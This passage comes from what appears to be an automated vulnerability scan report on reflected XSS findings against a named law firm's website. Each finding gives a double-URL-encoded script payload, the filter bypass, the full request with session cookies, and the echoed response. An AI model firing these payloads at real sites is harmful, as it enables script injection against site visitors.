There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Postale6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Postale6c53"><script>alert(1)</script>2206f6e398b/rss.xml" value="">
...[SNIP]...

4.282. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 was submitted in the REST URL parameter 4. This input was echoed as 5a1f6"><script>alert(1)</script>af2258d21b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Postal/rss.xml5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Postal/rss.xml5a1f6"><script>alert(1)</script>af2258d21b7" value="">
...[SNIP]...

4.283. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b was submitted in the REST URL parameter 1. This input was echoed as 35e2f"><script>alert(1)</script>69c57b225b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b/practices/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss35e2f"><script>alert(1)</script>69c57b225b/practices/Privacy/rss.xml" value="">
...[SNIP]...

4.284. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb was submitted in the REST URL parameter 2. This input was echoed as 38e63"><script>alert(1)</script>99d2689ecdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices38e63"><script>alert(1)</script>99d2689ecdb/Privacy/rss.xml" value="">
...[SNIP]...

4.285. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0 was submitted in the REST URL parameter 3. This input was echoed as 5a06f"><script>alert(1)</script>ae4d6666dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Privacy5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Privacy5a06f"><script>alert(1)</script>ae4d6666dc0/rss.xml" value="">
...[SNIP]...

4.286. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be was submitted in the REST URL parameter 4. This input was echoed as 4256c"><script>alert(1)</script>823dd7739be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Privacy/rss.xml4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Privacy/rss.xml4256c"><script>alert(1)</script>823dd7739be" value="">
...[SNIP]...

4.287. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f was submitted in the REST URL parameter 1. This input was echoed as ab6ad"><script>alert(1)</script>3058a7872f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f/practices/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssab6ad"><script>alert(1)</script>3058a7872f/practices/Professional_Liability/rss.xml" value="">
...[SNIP]...

4.288. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13 was submitted in the REST URL parameter 2. This input was echoed as b635c"><script>alert(1)</script>bb61d6adb13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesb635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesb635c"><script>alert(1)</script>bb61d6adb13/Professional_Liability/rss.xml" value="">
...[SNIP]...

4.289. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf was submitted in the REST URL parameter 3. This input was echoed as 7b62f"><script>alert(1)</script>209c75ecebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Professional_Liability7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Professional_Liability7b62f"><script>alert(1)</script>209c75ecebf/rss.xml" value="">
...[SNIP]...

4.290. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 was submitted in the REST URL parameter 4. This input was echoed as a3cc2"><script>alert(1)</script>842ba8b7f27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Professional_Liability/rss.xmla3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Professional_Liability/rss.xmla3cc2"><script>alert(1)</script>842ba8b7f27" value="">
...[SNIP]...

4.291. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7 was submitted in the REST URL parameter 1. This input was echoed as 43538"><script>alert(1)</script>239e5feec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7/practices/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss43538"><script>alert(1)</script>239e5feec7/practices/Public_Policy/rss.xml" value="">
...[SNIP]...

4.292. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80 was submitted in the REST URL parameter 2. This input was echoed as 95bab"><script>alert(1)</script>4f44ea70a80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices95bab"><script>alert(1)</script>4f44ea70a80/Public_Policy/rss.xml" value="">
...[SNIP]...

4.293. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123 was submitted in the REST URL parameter 3. This input was echoed as bf26f"><script>alert(1)</script>e7d3032f123 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Public_Policybf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Public_Policybf26f"><script>alert(1)</script>e7d3032f123/rss.xml" value="">
...[SNIP]...

4.294. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 was submitted in the REST URL parameter 4. This input was echoed as cc78d"><script>alert(1)</script>35e1d1edf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Public_Policy/rss.xmlcc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Public_Policy/rss.xmlcc78d"><script>alert(1)</script>35e1d1edf9" value="">
...[SNIP]...

4.295. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202 was submitted in the REST URL parameter 1. This input was echoed as 8e1f4"><script>alert(1)</script>0a2d2f96202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202/practices/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
